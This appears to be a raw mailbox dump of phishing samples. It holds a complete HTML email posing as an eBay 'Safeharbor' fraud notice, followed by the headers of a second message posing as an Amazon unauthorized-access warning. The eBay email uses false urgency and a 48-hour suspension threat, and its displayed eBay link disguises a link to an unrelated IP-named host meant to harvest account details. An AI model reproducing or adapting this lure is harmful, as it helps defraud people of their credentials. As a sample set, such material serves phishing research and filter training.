From: "service@eBay.com" <service@eBay.com>
Content-Type: text/html
Status: O
X-Status: 
X-Keywords:                  
X-UID: 316


<DIV style="FONT-FAMILY: Arial">
<TABLE cellSpacing=0 cellPadding=0 width=600 align=center border=0>
<TBODY>
<TR>
<TD><A href="http://click3.ebay.com/99019653.50692.0.20283" target=_blank><IMG src="http://emailpics3.ebay.com/627422250/images/logo-18.gif" border=0></A></TD></TR>
<TR>
<TD> </TD></TR>
<TR>
<TD><FONT face="Arial, Helvetica, sans-serif" color=#000000 size=3><STRONG>***Urgent Safeharbor Department Notice***</STRONG></FONT></TD></TR>
<TR>
<TD> </TD></TR></TBODY></TABLE>
<TABLE cellSpacing=0 cellPadding=5 width=600 align=center border=0>
<TBODY>
<TR>
<TD vAlign=top height=259>
<P><FONT face="Arial, Helvetica,
sans-serif" size=2><STRONG>eBay Fraud Mediation Request</STRONG><BR></FONT></P>
<P><FONT face="Arial, Helvetica, sans-serif" size=2>You have recieved this email because you or someone had used your account to make fake bids at eBay. For security purposes, we are required to open an investigation into this matter. </FONT></P>
<P><FONT face="Arial, Helvetica, sans-serif" size=2>THE FRAUD ALERT ID CODE CONTAINED IN THIS MESSAGE WILL BE ATTACHED IN OUR FRAUD MEDIATION REQUEST FORM, IN ORDER TO VERIFY YOUR EBAY ACCOUNT REGISTRATION INFORMATIONS.</FONT></P>
<P><FONT face="Arial, Helvetica, sans-serif" size=2><STRONG>Fraud Alert ID CODE: 00937614</STRONG><BR><FONT face="Verdana, Arial, Helvetica, sans-serif" size=1>(Please save this Fraud Alert ID Code for your reference.</FONT>)<BR><BR>To help speed up this process, please access the following form to complete the verification of your eBay account registration informations:</FONT></P>
<P><STRONG><FONT face="Arial, Helvetica, sans-serif" color=#003399 size=2><A onclick="return ShowLinkWarning()" href="http://59-120-43-88.HINET-IP.hinet.net/~alpha/ebay/" target=_blank>http://scgi.ebay.com/verify_id=ebay &fraud alert id code=00937614</A></FONT></STRONG></P>
<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0>
<TBODY>
<TR>
<TD>
<P><FONT size=1>.</FONT></P></TD></TR>
<TR>
<TD>
<TABLE width="100%" border=0>
<TBODY>
<TR>
<TD bgColor=#e6e6ff><FONT face="Arial, Helvetica, sans-serif" size=2><STRONG>Please Note: </STRONG><BR>If we do not receive the appropriate eBay account verification within 48 hours, then we will assume this eBay account is fraudulent and will be suspended. <BR>The purpose of this verification is to ensure that your eBay account has not been fraudulently used and to combat the fraud from our community.</FONT></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE>
<P><FONT face="Arial, Helvetica, sans-serif" size=2><FONT color=#000000>We appreciate your support and understanding, as we work together to keep eBay a safe place to trade.</FONT></FONT><FONT face="Arial, Helvetica, sans-serif" color=#000000 size=2><BR><BR>Thank you for your patience in this matter.</FONT></P>
<P align=left><FONT face="Arial, Helvetica, sans-serif" color=#000000 size=2>Regards, Safeharbor Department (Trust and Safety Department)<BR>eBay Inc.</FONT><FONT face="Arial, Helvetica, sans-serif" size=2><BR><BR><FONT color=#999999 size=1>Please do not reply to this e-mail as this is only a notification. Mail sent to this address cannot be answered. </FONT></FONT></P></TD></TR>
<TR>
<TD align=middle>
<P align=center><FONT face="Arial,
Helvetica, sans-serif" color=#000000 size=1><BR><BR>Copyright © 2005 eBay Inc. All Rights Reserved. Designated trademarks and brands are the property of their respective owners. eBay and the eBay logo are trademarks of eBay Inc. eBay is located at 2145 Hamilton Avenue, San Jose, CA 95125. </FONT></P></TD></TR></TBODY></TABLE></DIV>

From ftpuser@dominion.eurisko.net.ar  Tue Jan 31 18:47:41 2006
Return-Path: <ftpuser@dominion.eurisko.net.ar>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail1.example.com (mail1.example.com [10.1.2.3])
	by naughty.example.com (Postfix) with ESMTP id 96E96536EC3
	for <nobody@login.example.com>; Tue, 31 Jan 2006 18:47:41 -0500 (EST)
Received: from lujan.example.com (foo.example.com [10.2.3.4])
	by mail1.example.com (Postfix) with ESMTP id 6EB2E6CCF0D
	for <nobody@example.com>; Tue, 31 Jan 2006 18:47:40 -0500 (EST)
Received: by lujan.example.com (Postfix)
	id 897591BC3D; Wed,  1 Feb 2006 00:47:37 +0100 (CET)
Delivered-To: foobee@example.com
Received: from localhost (unknown [127.0.0.1])
	by lujan.example.com (Postfix) with ESMTP id 2DFEA1BC14
	for <foobee@example.com>; Tue, 31 Jan 2006 23:47:37 +0000 (UTC)
Received: from lujan.example.com ([127.0.0.1])
	by localhost (lujan [127.0.0.1]) (amavisd-new, port 10024) with ESMTP
	id 12608-01 for <foobee@example.com>;
	Wed, 1 Feb 2006 00:47:22 +0100 (CET)
Received: from dominion.eurisko.net.ar (dominion.eurisko.net.ar [200.49.158.99])
	by lujan.example.com (Postfix) with SMTP id 07B4D1B8E2
	for <foobee@example.com>; Wed,  1 Feb 2006 00:47:14 +0100 (CET)
Received: (qmail 11745 invoked by uid 1002); 31 Jan 2006 23:46:55 -0000
Date: 31 Jan 2006 23:46:55 -0000
To: foobee@example.com
Subject: Amazon - Security Service   Amazon - Warning: Unauthorized Access Report (DTM975W003V34721L5KM)
Message-ID: <1138751215.20076.qmail@amazon.com>
